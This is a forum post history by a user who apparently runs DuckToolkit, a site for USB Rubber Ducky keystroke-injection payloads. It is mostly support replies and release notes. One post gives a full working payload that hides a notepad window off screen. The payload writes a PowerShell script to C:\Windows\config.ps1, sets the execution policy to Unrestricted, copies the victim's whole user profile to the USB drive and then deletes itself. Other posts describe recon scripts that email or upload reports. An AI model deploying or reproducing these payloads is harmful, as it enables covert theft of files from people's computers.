Everything posted by 411Hall

  1. Try the code below. If you're going to use CONTROL ALT with a command after, you need to shorten it to CTRL-ALT.

       REM Logon
       DELAY 4000
       CTRL-ALT DELETE
       STRING Computer_Password
       ENTER
       DELAY 500
       REM Open Website
       CTRL-ALT a
       DELAY 500
       REM Logon
       STRING Username
       TAB
       STRING Site_Password
       ENTER
       DELAY 500
       REM Maximize Screen
       WINDOWS UPARROW

  2. All fixed now, thank you for the heads up :)
  3. What language are you using? ymode will appear when the commands ALT y, DELAY 1000, STRING mode con:cols=14 lines=1 are not recognised. I have no idea why it's saying PowerShell.exe isn't a valid executable. Can you run it manually from Windows Key + R?
  4. Thanks! Do any of the other encoders currently support Swedish layout? If they do I can just modify it to work with the toolkit.
  5. Hello everyone. Sorry for the delay in replies and issues with the previous site over the past few months. I am happy to announce that the DuckToolkit NG is now available! This is an entirely new version of the previous site which has been rewritten in Python/Django by myself and KevtheHermit. Current Features: Online Encoder; 30+ Recon/Exploit/Reporting PowerShell scripts; Online Decoder; UK/US Language Support; Standalone Python Encoder/Decoder. We are working to add new languages and to implement Linux/OSX scripts in the coming weeks, however since this is an open source project please feel free to help us! If you want a certain language added then help us by writing it! You can access the online DuckToolkit NG here: https://www.ducktoolkit.com You can access the standalone DuckToolkit here: https://github.com/kevthehermit/DuckToolkit Any issues, comments or suggestions then either post on the Disqus thread on the website or respond in this thread, 411.
  6. Sorry for the downtime everyone. The old site is now back up. I am working on a new site and have moved the old site to a new hosting provider and have had a few issues. Hoping to have the new site up and running by April! It will be worth the wait! 411.
  7. Hi mate, yeah no worries. Send me the .txt, .bin and .ps1 file and I will have a look. It might also be worth launching the PowerShell.exe on your Windows box, navigating to the .ps1 file and attempting to run it from command line. That will show you if there are any errors when it attempts to run. I will be away for the weekend btw so won't be able to look until Monday. Cheers, 411.
  8. Hi Ardetroya, sorry for not replying sooner, I have only just seen this post! Do you have a copy of the properties file? I will update asap. Thanks, 411.
  9. Just a heads up. I have updated the encoder on the Toolkit to 2.6.3. Hoping this will fix the issues users have been having with the Encoder. Any issues let me know. 411.
  10. Yeah sorry about that, appears the site ran out of space even though that should never happen. It's back up now. 411.
  11. This is awesome! As it's Java based would you consider some type of collaboration so we could try and get this onto the Duck Toolkit? Obviously full credit would go to you!
  12. Hi nazgul, sorry you are having issues! Would you mind sending the .txt and .bin payloads to ducktoolkit@outlook.com so I can have a look? There is definitely something wrong as the PowerShell file should be hidden in C:\Windows. 411.
  13. Hi xyntax, sorry for the delay in my reply. I believe there is an issue with the Italian keyboard layout in the latest encoder as you are not the only person to report this to me. The down arrows are there to pull the notepad off screen. The amount of down arrows required to get the notepad off screen varies depending on screen resolution. Since I don't know the user's screen resolution I have included more than would probably be necessary to ensure the notepad is always hidden. 411.
  14. Nice work, looks really extensive! Haven't got my ducky with me now but I will run it as soon as I get chance. 411.
  15. So did it not run? What operating system are you running? 411.
  16. I have added a new delay feature to the Toolkit. Now you can specify exactly how much delay you want on each script, this should prevent any run time errors with the scripts trying to execute faster than the target computer can handle. 411.
  17. Have you tried again since I added the new delay feature? You now choose exactly how much delay is on each script. So maybe try setting it to the max to see if that runs? If it does then it has to be a timing issue. 411.
  18. In response to this, yes, that wouldn't be a problem at all. I will probably append a time stamp to the report name so 'Report 08:00:00 07.05.2014.zip' That work for you? I will make the changes over the next weekend. As for PowerShell, as Merlintime has pointed out it's incredibly powerful and there are loads of ways you can remotely administer machines. When I was writing the Toolkit I discovered loads of awesome uses for it but I decided to leave remotely networked machines out of the scope as there are certain variables I wouldn't know. Anyway I have all of my PowerShell scripts minus the Duck code stored somewhere so if you want them let me know. Also let me know if you write anything you think could be a good payload. I'm always looking for new scripts! 411.
  19. Hi, sorry for the delay in my reply. So do you ever see notepad open and the script being typed out? If not I am thinking that the delay on the scripts may be too little and therefore the ducky is typing faster than the PC can handle. Let me know, I am working on a solution to this that should be released in a few weeks but there is a workaround we can do in the meantime. 411.
  20. No trailing slashes or anything needed. If you don't mind PMing me the details will probably be the quickest way to sort it. Sorry about that 411.
  21. Sorry about the issues mate. I just tried putting in: ftp://username:pass@example.com That worked fine for me. Are you by chance adding brackets on either side? If so don't! Not really too sure why I added to the example tbh so I will remove during next update. Hope that fixes it. 411.
  22. Sorry about that mate. It's exactly what Merlintime said, nice one btw! The PowerShell file which is created when the script is deployed is called config.ps1, this is saved in the C:\Windows folder. The file will erase itself after completion. So the fact that it's still there means the script you run before has either errored or hasn't completed. Have you by chance run the Twin Duck script? I seem to remember that doesn't finish for a very very long time even after a lot of the files have been copied to the USB. Anyway it's a simple enough fix. I will make sure that future scripts overwrite the config.ps1 file if it's present. Should be able to push the changes out by the weekend. Issue is now fixed. Thanks for using the Toolkit and sorry about the issues. 411.
  23. If you're interested I have a slightly different version of the Ducky Slurp. Same premise as Darren's and Overwraith's just written in PowerShell.

       DELAY 3000
       GUI r
       DELAY 750
       STRING powershell Start-Process notepad -Verb runAs
       ENTER
       DELAY 1500
       ALT y
       DELAY 500
       ENTER
       ALT SPACE
       DELAY 100
       STRING m
       DELAY 200
       DOWNARROW
       DOWNARROW
       DOWNARROW
       DOWNARROW
       DOWNARROW
       DOWNARROW
       DOWNARROW
       DOWNARROW
       DOWNARROW
       DOWNARROW
       ENTER
       STRING $userDir = (Get-ChildItem env:\userprofile).value + '\'
       ENTER
       STRING $usbPresent = 'False'
       ENTER
       STRING do {
       ENTER
       STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | Measure
       ENTER
       STRING if ($present.Count -ge 1){
       ENTER
       STRING $usbPresent = 'True' }Else {
       ENTER
       STRING $usbPresent = 'False'}}
       ENTER
       STRING until ($usbPresent -eq 'True')
       ENTER
       STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select Name
       ENTER
       STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select name
       ENTER
       STRING copy-item $userDir $usbPath.Name -recurse
       ENTER
       STRING Remove-Item $MyINvocation.InvocationName
       ENTER
       CTRL S
       DELAY 1500
       STRING C:\Windows\config.ps1
       ENTER
       DELAY 2000
       ALT F4
       DELAY 200
       GUI r
       DELAY 500
       STRING powershell Start-Process cmd -Verb runAs
       ENTER
       DELAY 1500
       ALT y
       DELAY 500
       STRING mode con:cols=14 lines=1
       ENTER
       ALT SPACE
       DELAY 100
       STRING m
       DELAY 200
       DOWNARROW
       DOWNARROW
       DOWNARROW
       DOWNARROW
       DOWNARROW
       DOWNARROW
       DOWNARROW
       DOWNARROW
       DOWNARROW
       DOWNARROW
       ENTER
       STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
       ENTER
       DELAY 1000
       STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1
       ENTER

     There is also a USB Reporting method on the Duck Toolkit. 411.
  24. Version 2 of the Duck Toolkit is now online! v.2 Changes: New UI; USB Reporting Payload; Duck Slurp Payload; Fixed Encoder Issues; USB Recon Script Updated; Fixed Other Backend Issues. Check it out at http://www.ducktoolkit.com Feedback is always appreciated. Also I really want to get some fresh scripts on the site in the coming weeks so if anyone has any requests just message me. Enjoy, 411.
  25. Hey mate, Sorry about that. I have just tested the script and it worked for me, I am assuming you have checked Junk folders etc? (I have to ask) I think you may be having one of two possible issues: 1. It's possible that the 'Report.zip' isn't ever being created so it can be uploaded and sent via email, that would cause the script to crash. 2. SMTP (port 25) may be blocked on your firewall which is preventing the script from being sent. However I have never had this issue and I have tried on several computers with different firewalls etc. First thing I would try is disabling any firewalls etc and doing a test run, if the email arrives then problem sorted. Although I will need to fix that issue. If that doesn't work then it's probably a 'Report.zip' issue. Could you try making a recon script and select the 'Save Report to Target Machine' option, enter a folder directory for the file to save to and run the script. That will let me know if the zip creation functionality is working on your computer. Sorry for the issues, 411.